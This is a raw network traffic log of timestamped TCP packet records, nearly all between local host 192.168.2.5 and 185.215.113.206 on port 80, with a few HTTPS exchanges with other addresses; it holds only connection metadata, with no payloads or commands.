Nov 10, 2024 04:55:25.581018925 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.581068993 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.581068993 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.583333015 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.586544991 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.586564064 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.586642981 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.586652994 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.587635040 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.588083982 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.588285923 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.622736931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.622754097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.622765064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.622802973 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.622858047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692401886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692411900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692421913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692433119 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692522049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692531109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692550898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692552090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692563057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692590952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692591906 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692625046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692629099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692640066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692667961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692692041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692765951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692785025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692800999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692817926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692837954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692842960 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692842960 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692850113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692864895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692884922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692884922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692884922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.692895889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692905903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692917109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.692922115 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693017006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693051100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693062067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693094969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693106890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693115950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693126917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693126917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693152905 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693286896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693310976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693321943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693336964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693336964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693423033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693434000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693444967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693461895 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693470955 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693479061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693495035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693495989 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693511009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693521976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693530083 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693530083 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693533897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693551064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693556070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693556070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693568945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693587065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693587065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693593025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693604946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693628073 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693630934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693638086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693649054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693662882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693679094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693679094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693691969 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693695068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693706036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693717003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693727016 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693746090 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693747997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693758965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693763971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693773031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693783998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693789959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693790913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693794012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693804026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693814993 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693825006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693825006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693825006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693871975 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693871975 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693892956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693903923 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693913937 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693923950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693933964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693945885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.693953037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693990946 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693990946 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.693998098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694037914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694048882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694083929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694093943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694103956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694128036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694143057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694143057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694170952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694180965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694190979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694219112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694219112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694238901 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694248915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694268942 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694272995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694288015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694298983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694309950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694309950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694312096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694334984 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694345951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694350004 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694355965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694356918 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694380999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694391966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694401979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694406033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694406033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694443941 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694453955 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694453955 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694454908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694462061 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694489002 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694499969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694509029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694519997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694534063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694534063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694567919 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694567919 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694650888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694690943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694701910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694737911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694741964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694747925 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694758892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694793940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694823027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694834948 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694842100 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694859982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694871902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694879055 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694879055 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694881916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694894075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694907904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694941044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694941044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.694960117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694972038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694983006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.694993973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695019007 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695059061 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695070028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695080996 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695101976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695101976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695106983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695116997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695127964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695133924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695143938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695149899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695153952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695154905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695167065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695177078 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695214033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695233107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695240021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695244074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695265055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695281029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695291042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695293903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695317030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695333958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695341110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695344925 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695358038 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695369005 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695384979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695393085 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695395947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695405960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695415974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695440054 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695440054 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695456982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695466995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695476055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695481062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695491076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695513010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695514917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695523977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695539951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695542097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695542097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695561886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695571899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695581913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695588112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695588112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695591927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695601940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695614100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695632935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695641041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695641041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695667982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695671082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695698977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695700884 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695754051 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695772886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695775032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695786953 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695811033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695821047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695821047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695822001 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695832014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695847988 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.695858955 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.695868969 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696130037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696157932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696166992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696227074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696263075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696329117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696353912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696363926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696377039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696383953 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696403980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696414948 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696424007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696430922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696436882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696446896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696451902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696451902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696461916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696485996 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696491957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696505070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696510077 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696522951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696537971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696543932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696543932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696551085 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696561098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696566105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696590900 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696609020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696609020 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696650028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696661949 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696707964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696711063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696711063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696726084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696737051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696748018 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696753025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696763039 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696784973 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696789026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696799040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696809053 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696818113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696825981 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696855068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696882010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696897984 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696911097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696922064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696922064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696923018 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696949005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696949005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696978092 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.696979046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.696994066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697005033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697016954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697046041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697061062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697061062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697067976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697078943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697088957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697093010 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697113991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697124004 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697132111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697132111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697135925 CET	80	49771	185.215.113.206	192.168.2.5
